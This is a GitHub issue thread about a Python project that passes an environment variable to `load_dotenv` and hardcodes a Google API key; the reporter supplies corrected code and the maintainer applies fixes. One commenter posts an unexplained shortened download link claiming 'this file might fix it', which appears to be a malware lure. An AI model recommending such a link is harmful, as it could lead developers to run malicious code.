### ISSUE TITLE
Bug: Incorrect Usage of `load_dotenv`

### ISSUE THREAD

**Issue by Hamza-nabil** [HealthInnovators/AgroVisionAI#1]
## Issue Description
The `load_dotenv` function is incorrectly used with a specific environment variable as an argument instead of the file path. This results in environment variables not being loaded properly.

https://github.com/HealthInnovators/AgroVisionAI/blob/e00cd3bd94b476aa3d9053197f0e68e3b3c586d8/llm.py#L2

`load_dotenv` should be used with the path to the .env file, not with a specific environment variable.

## Correct Usage:

```python
from dotenv import load_dotenv
load_dotenv()  # Automatically looks for a .env file in the current directory
```
If you have a specific path for the .env file, use:

```python
Copy code
load_dotenv("/path/to/.env")
```
## Suggested Solution:

- Correct the `load_dotenv` usage to ensure it loads environment variables from the .env file.
- Remove the hardcoded API key from the source code.

## References:

[python-dotenv Documentation](https://pypi.org/project/python-dotenv/)

**Comment by AmjedKhaled165** [comment]
This might help:This file might fix it
https://bit.ly/4gwC82r

you may need to install the c compiler

**Comment by Srikanthk-2000** [comment]
I have updated.

**Comment by Hamza-nabil** [comment]
it is still in here : 
https://github.com/HealthInnovators/AgroVisionAI/blob/fa8b030be8d5ce1a09c8410f2efc825dab008efc/llm.py#L2

And this line : 

https://github.com/HealthInnovators/AgroVisionAI/blob/fa8b030be8d5ce1a09c8410f2efc825dab008efc/multimodal_gemini.py#L8
Should updated to : 

```python
google_api_key = os.getenv("GOOGLE_API_KEY")
genai.configure(api_key=google_api_key)
```

**Comment by Srikanthk-2000** [comment]
I have updated.

**Comment by Hamza-nabil** [comment]
Great ! Good Luck!
